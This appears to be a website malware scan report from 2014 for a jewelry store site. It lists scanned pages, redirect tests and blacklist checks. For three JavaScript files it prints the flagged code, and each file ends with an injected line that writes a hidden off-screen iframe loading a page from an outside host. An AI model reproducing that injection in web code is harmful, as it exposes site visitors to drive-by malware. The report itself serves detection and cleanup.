Scanned pages/files
Request | Server response | Status |
http://goldngiftsjewelry.com/ | 200 OK Content-Length: 10049 Content-Type: text/html | clean |
http://goldngiftsjewelry.com/media/system/js/caption.js | 200 OK Content-Length: 2132 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://qqbmaf.wikaba.com/3cdb9bc5c502b1778f26.8hSCdn7?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://goldngiftsjewelry.com/templates/goldngifts/script.js | 200 OK Content-Length: 11223 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) cssFix = function(){ var u = navigator.userAgent.toLowerCase(), addClass = function(el, val){ if(! el.className) { el.className = val; } else { var newCl = el.className; newCl+=(' '+val); el.className = newCl; } }, is = function(t){return (u.indexOf(t)!=-1)}; addClass(document.getElementsByTagName('html')[0],[ (!(/opera|webtv/i.test(u))&&/msie (\d)/.test(u))?('ie ie'+RegExp.$1) : is(' }); } } } artLoadEvent.add(function() { artButtonsSetupJsHover("art-button"); }); artLoadEvent.add(function() { artButtonsSetupJsHover("button"); artButtonsSetupJsHover("readon"); });document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://qqbmaf.wikaba.com/3cdb9bc5c502b1778f26.8hSCdn7?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://goldngiftsjewelry.com/index.php?option=com_content&view=article&id=2&Itemid=5 | 200 OK Content-Length: 8930 Content-Type: text/html | clean |
http://goldngiftsjewelry.com/index.php?option=com_contact&view=contact&id=1&Itemid=6 | 200 OK Content-Length: 10925 Content-Type: text/html | clean |
http://goldngiftsjewelry.com/media/system/js/validate.js | 200 OK Content-Length: 4414 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JFormValidator = new Class({ initialize: function() { this.handlers = Object(); this.custom = Object(); this.setHandler('username', function (value) { regex = new RegExp("[\<|\>|\"|\'|\%|\;|\(|\)|\&]", "i"); return !regex.test(value); } ); this.setHandler('password', function (value) { regex=/^\S[\S ]{2,98}\S$/; return regex.test(value); } ); this.setHandler('numeric } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); });document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://qqbmaf.wikaba.com/3cdb9bc5c502b1778f26.8hSCdn7?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://goldngiftsjewelry.com/index.php?option=com_content&view=section&layout=blog&id=4&Itemid=11 | 200 OK Content-Length: 13568 Content-Type: text/html | clean |
http://goldngiftsjewelry.com/index.php?option=com_content&view=section&id=3&Itemid=10 | 200 OK Content-Length: 9138 Content-Type: text/html | clean |
http://goldngiftsjewelry.com/index.php?option=com_content&view=section&id=1&Itemid=9 | 200 OK Content-Length: 8586 Content-Type: text/html | clean |
http://goldngiftsjewelry.com/index.php?option=com_content&view=section&id=2&Itemid=12 | 200 OK Content-Length: 8591 Content-Type: text/html | clean |
http://goldngiftsjewelry.com/index.php?option=com_content&view=article&id=1&Itemid=1 | 200 OK Content-Length: 10049 Content-Type: text/html | clean |
http://goldngiftsjewelry.com/index.php?option=com_xmap&sitemap=1&Itemid=4 | 200 OK Content-Length: 11322 Content-Type: text/html | clean |
http://goldngiftsjewelry.com/index.php?option=com_content&view=category&id=10:press-releases&layout=blog&Itemid=11 | 200 OK Content-Length: 10840 Content-Type: text/html | clean |
http://goldngiftsjewelry.com/index.php?view=article&catid=10%3Apress-releases&id=4%3Abest-jewelry-store-in-athens-award-&format=pdf&option=com_content&Itemid=11 | 200 OK Content-Length: 240117 Content-Type: application/pdf | clean |
http://goldngiftsjewelry.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: goldngiftsjewelry.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 14 Nov 2014 20:52:12 GMT
Pragma: no-cache
Server: Apache/2.2.15
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 14 Nov 2014 20:52:12 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 5e0dd17f3feedadeabcc4ee7ccdee82b=n7atvralgq8q0k36e48nqnotl0; path=/
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: goldngiftsjewelry.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 14 Nov 2014 20:52:12 GMT
Pragma: no-cache
Server: Apache/2.2.15
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 14 Nov 2014 20:52:12 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 5e0dd17f3feedadeabcc4ee7ccdee82b=n7atvralgq8q0k36e48nqnotl0; path=/
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: goldngiftsjewelry.com
Referer: http://www.google.com/search?q=goldngiftsjewelry.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: goldngiftsjewelry.com
Referer: http://www.google.com/search?q=goldngiftsjewelry.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=goldngiftsjewelry.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://goldngiftsjewelry.com/
Result: goldngiftsjewelry.com is not infected or malware details are not published yet.
Result: goldngiftsjewelry.com is not infected or malware details are not published yet.